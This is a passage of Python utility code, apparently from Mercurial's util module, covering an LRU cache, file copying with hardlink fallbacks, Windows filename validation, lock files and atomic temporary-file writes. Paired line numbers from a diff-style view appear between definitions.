        succeeded = exc_type is None
        try:
            # Only commit on a clean exit; an exception aborts via
            # release() alone.
            if succeeded:
                self.close()
        finally:
            self.release()
1362 1362
1363 1363
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        try:
            yield
        except error.InterventionRequired:
            # An intervention is not a failure: commit before re-raising.
            tr.close()
            raise
        else:
            tr.close()
    finally:
        tr.release()
1381 1381
1382 1382
@contextlib.contextmanager
def nullcontextmanager():
    # A no-op context manager; entering it yields None and exiting does
    # nothing.
    yield
1386 1386
1387 1387
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """

    __slots__ = ('next', 'prev', 'key', 'value', 'cost')

    def __init__(self):
        self.next = None
        self.prev = None
        # Nodes start out in the emptied state (key is the _notset
        # sentinel, no value, zero cost).
        self.markempty()

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0
1410 1410
1411 1411
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new code. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """

    def __init__(self, max, maxcost=0):
        # Backing dict: key -> _lrucachenode.
        self._cache = {}

        # The circular linked list starts as a single empty node pointing
        # at itself; _size counts linked-list nodes, not cache entries.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # A lookup counts as an access: promote the node to newest.
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        # Remove and return the value for k; raises KeyError unless a
        # default was supplied.
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default

        assert node is not None  # help pytype
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        # Empty every linked-list node in place (the nodes themselves are
        # kept for reuse), then drop the backing dict entries.
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        assert n is not None  # help pytype

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
1708 1708
1709 1709
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()

    if func.__code__.co_argcount == 1:
        # Single-argument fast path: key on the argument directly.
        def f(arg):
            if arg in cache:
                order.remove(arg)
            else:
                if len(cache) > 20:
                    # Evict the least recently used entry.
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]

    else:

        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
1739 1739
1740 1740
class propertycache(object):
    """Non-data descriptor that caches its getter's result on the instance.

    The first attribute access runs ``func`` and stores the result in the
    instance ``__dict__`` under the same name, so later lookups bypass the
    descriptor entirely.
    """

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1754 1754
1755 1755
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # pop() with a default is a no-op when the property was never cached.
    obj.__dict__.pop(pycompat.sysstr(prop), None)
1761 1761
1762 1762
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''

    def log2(x):
        # floor(log2(x)) for positive x; 0 for x == 0, matching the
        # original bit-shift loop.
        return x.bit_length() - 1 if x else 0

    pending = []
    pendinglen = 0
    for chunk in source:
        pending.append(chunk)
        pendinglen += len(chunk)
        if pendinglen < min:
            continue
        if min < max:
            # Double the threshold, or jump straight to the largest
            # power of two not exceeding what we actually buffered,
            # capped at max.
            min = min << 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield b''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        yield b''.join(pending)
1794 1794
1795 1795
def always(fn):
    # Predicate that returns True regardless of ``fn``.
    return True
1798 1798
1799 1799
def never(fn):
    # Predicate that returns False regardless of ``fn``.
    return False
1802 1802
1803 1803
def nogc(func):
    """Decorator disabling the garbage collector around ``func``.

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking
    has no effect on when GCs are triggered, only on what objects the GC
    looks into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """

    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Only re-enable if the caller had it enabled to begin with.
            if wasenabled:
                gc.enable()

    return wrapper
1828 1828
1829 1829
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so make nogc a no-op there and
    # return the function unchanged.
    nogc = lambda x: x
1833 1833
1834 1834
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # Different drives: no relative path exists, anchor at root.
            return os.path.join(root, localpath(n2))
        n2 = b'/'.join((pconvert(root), n2))
    comps1 = splitpath(n1)
    comps2 = n2.split(b'/')
    comps1.reverse()
    comps2.reverse()
    # Strip the common leading components (the tails of the reversed
    # lists).
    while comps1 and comps2 and comps1[-1] == comps2[-1]:
        comps1.pop()
        comps2.pop()
    comps2.reverse()
    # Climb out of what remains of n1, then descend into n2.
    return pycompat.ossep.join([b'..'] * len(comps1) + comps2) or b'.'
1860 1860
1861 1861
def checksignature(func, depth=1):
    '''wrap a function with code to check for calling errors'''

    def wrapped(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a TypeError whose traceback is exactly *depth* frames deep
            # originated from the call itself (bad signature), not from
            # inside func's body
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == depth:
                raise error.SignatureError
            raise

    return wrapped
1874 1874
1875 1875
# a whitelist of known filesystems where hardlink works reliably
# (consulted by copyfile() before attempting oslink(); CIFS in particular
# is excluded, see issue4546)
_hardlinkfswhitelist = {
    b'apfs',
    b'btrfs',
    b'ext2',
    b'ext3',
    b'ext4',
    b'hfs',
    b'jfs',
    b'NTFS',
    b'reiserfs',
    b'tmpfs',
    b'ufs',
    b'xfs',
    b'zfs',
}
1892 1892
1893 1893
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the pre-replacement stat so a timestamp ambiguity
            # with the new file can be detected and worked around below
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass  # fall back to normal copy
    if os.path.islink(src):
        # preserve the symlink itself rather than copying its target
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one;
                        # nudge mtime forward one second (mod 2**31) so the
                        # change is observable
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1
                        ) & 0x7FFFFFFF
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(stringutil.forcebytestr(inst))
1947 1947
1948 1948
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible.

    Returns a ``(hardlink, num)`` pair: whether hardlinking was still in
    effect at the end, and how many files were copied/linked.  When
    ``hardlink`` is None it is decided by whether src and dst live on the
    same device.
    """
    num = 0

    def settopic():
        # label the progress bar according to the copy strategy in use
        if progress:
            progress.topic = _(b'linking') if hardlink else _(b'copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinking is only possible within one filesystem
            hardlink = (
                os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            # the recursive call may flip hardlink to False on failure,
            # which then sticks for all remaining entries
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (
                os.stat(os.path.dirname(src)).st_dev
                == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # fall back (permanently) to plain copying
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num
1990 1990
1991 1991
# path components that Windows refuses as file names (matched
# case-insensitively on the part before the first dot); consulted by
# checkwinfilename() below
_winreservednames = {
    b'con',
    b'prn',
    b'aux',
    b'nul',
    b'com1',
    b'com2',
    b'com3',
    b'com4',
    b'com5',
    b'com6',
    b'com7',
    b'com8',
    b'com9',
    b'lpt1',
    b'lpt2',
    b'lpt3',
    b'lpt4',
    b'lpt5',
    b'lpt6',
    b'lpt7',
    b'lpt8',
    b'lpt9',
}
# characters valid in POSIX file names but rejected by Windows
_winreservedchars = b':*?"<>|'
2017 2017
2018 2018
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith(b'\\'):
        return _(b"filename ends with '\\', which is invalid on Windows")
    if b'\\/' in path:
        return _(b"directory name ends with '\\', which is invalid on Windows")
    # validate each path component separately; both separators count
    for n in path.replace(b'\\', b'/').split(b'/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return (
                    _(
                        b"filename contains '%s', which is reserved "
                        b"on Windows"
                    )
                    % c
                )
            # bytes 0-31 are control characters, forbidden in Windows names
            if ord(c) <= 31:
                return _(
                    b"filename contains '%s', which is invalid on Windows"
                ) % stringutil.escapestr(c)
        # reserved device names match on the part before the first dot
        # (e.g. 'con.xml' is still reserved)
        base = n.split(b'.')[0]
        if base and base.lower() in _winreservednames:
            return (
                _(b"filename contains '%s', which is reserved on Windows")
                % base
            )
        t = n[-1:]
        # trailing '.' or space is rejected; "n not in b'..'" is a
        # substring test that exempts the literal names '.' and '..'
        if t in b'. ' and n not in b'..':
            return (
                _(
                    b"filename ends with '%s', which is not allowed "
                    b"on Windows"
                )
                % t
            )
2078 2078
2079 2079
# best available high-resolution timer: time.perf_counter where present
# (Python >= 3.3), else a platform-appropriate fallback below
timer = getattr(time, "perf_counter", None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if not timer:
        # NOTE(review): time.clock was removed in Python 3.8, so this
        # fallback can only be reached on old interpreters
        timer = time.clock
else:
    # mercurial.windows doesn't have platform.checkosfilename
    checkosfilename = platform.checkosfilename  # pytype: disable=module-attr
    if not timer:
        timer = time.time
2091 2091
2092 2092
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    # preferred strategy: a symlink whose target carries the lock info,
    # created atomically by the OS
    try:
        os.symlink(info, pathname)
        return
    except AttributeError:  # no symlink in os
        pass
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
        # other failures (e.g. filesystem without symlink support) fall
        # through to the plain-file variant below

    # fallback: exclusive creation of a regular file holding the info
    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)
2111 2111
2112 2112
def readlock(pathname):
    """Return the info stored in the lock at *pathname*.

    Reads the symlink target when the lock is a symlink, otherwise the
    contents of the regular lock file (the makelock() fallback format).
    """
    try:
        return readlink(pathname)
    except AttributeError:  # no symlink in os
        pass
    except OSError as why:
        # EINVAL/ENOSYS mean "not a symlink here"; anything else is real
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    fp = posixfile(pathname, b'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2123 2123
2124 2124
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    fileno = getattr(fp, 'fileno', None)
    if fileno is None:
        # not backed by a real descriptor; stat by name instead
        return os.stat(fp.name)
    return os.fstat(fileno())
2131 2131
2132 2132
2133 2133 # File system features
2134 2134
2135 2135
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st = os.lstat(path)
    dirname, leaf = os.path.split(path)
    flipped = leaf.upper()
    if flipped == leaf:
        flipped = leaf.lower()
    if flipped == leaf:
        return True  # no evidence against case sensitivity
    try:
        # same inode under the case-flipped name => case-insensitive
        return os.lstat(os.path.join(dirname, flipped)) != st
    except OSError:
        return True
2158 2158
2159 2159
# Optional acceleration: Google's re2 regexp engine.  The module-level
# flag _re2 is tri-state: None = importable but not yet probed (see
# _re._checkre2()), False = unavailable/unusable, True = usable.
try:
    import re2  # pytype: disable=import-error

    _re2 = None
except ImportError:
    _re2 = False
2166 2166
2167 2167
class _re(object):
    """Facade choosing between the optional re2 engine and stdlib re."""

    def _checkre2(self):
        """Probe whether re2 actually works and record the result.

        Sets the module-level tri-state ``_re2`` flag (see the import
        block above).
        """
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes flags inline in the pattern, not as an argument
            if flags & remod.IGNORECASE:
                pat = b'(?i)' + pat
            if flags & remod.MULTILINE:
                pat = b'(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 doesn't support; fall back
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
2210 2210
2211 2211
# shared regexp-engine facade used throughout the codebase
re = _re()

# per-directory cache of os.listdir() results for fspath() below
_fspathcache = {}
2215 2215
2216 2216
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''

    def _makefspathcacheentry(dir):
        # map normcased name -> on-disk name for every entry of dir
        return {normcase(n): n for n in os.listdir(dir)}

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps.replace(b'\\', b'\\\\')
    # alternate runs of non-separator and separator characters
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separators are passed through verbatim
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        # fall back to the caller-supplied spelling for unknown entries
        result.append(found or part)
        dir = os.path.join(dir, part)

    return b''.join(result)
2259 2259
2260 2260
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        # create a scratch file next to testfile, then hardlink it
        fd, f1 = pycompat.mkstemp(
            prefix=b'.%s-' % os.path.basename(testfile),
            suffix=b'1~',
            dir=os.path.dirname(testfile),
        )
        os.close(fd)
        f2 = b'%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the scratch files
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2292 2292
2293 2293
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # note: deliberately returns the raw `and` result, mirroring the
    # historical truthy/falsy contract when osaltsep is unset
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
2301 2301
2302 2302
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    return path.split(pycompat.ossep)
2310 2310
2311 2311
def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, b"rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # nothing to copy: the empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, b"wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except:  # re-raises
        # don't leave a half-written temp file behind on failure
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2353 2353
2354 2354
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """

    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat from a path; stat is None if path is missing."""
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an open file object."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (
                self.stat.st_size == old.stat.st_size
                and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
                and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
            )
        except AttributeError:
            # at least one side has stat == None (file absent)
            pass
        try:
            # both absent counts as equal; a non-filestat peer -> False
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
        except AttributeError:
            # either side has no stat: cannot be ambiguous
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime one second past the old one, wrapped to 31 bits
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
2459 2459
2460 2460
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''

    def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
        self.__name = name  # permanent name
        self._tempname = mktempcopy(
            name,
            emptyok=(b'w' in mode),
            createmode=createmode,
            enforcewritable=(b'w' in mode),
        )

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Atomically replace the target file with the temporary copy."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # stat the target *before* the rename so mtime ambiguity with
            # the replacement can be detected afterwards
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw away all writes: remove the temp file without renaming."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

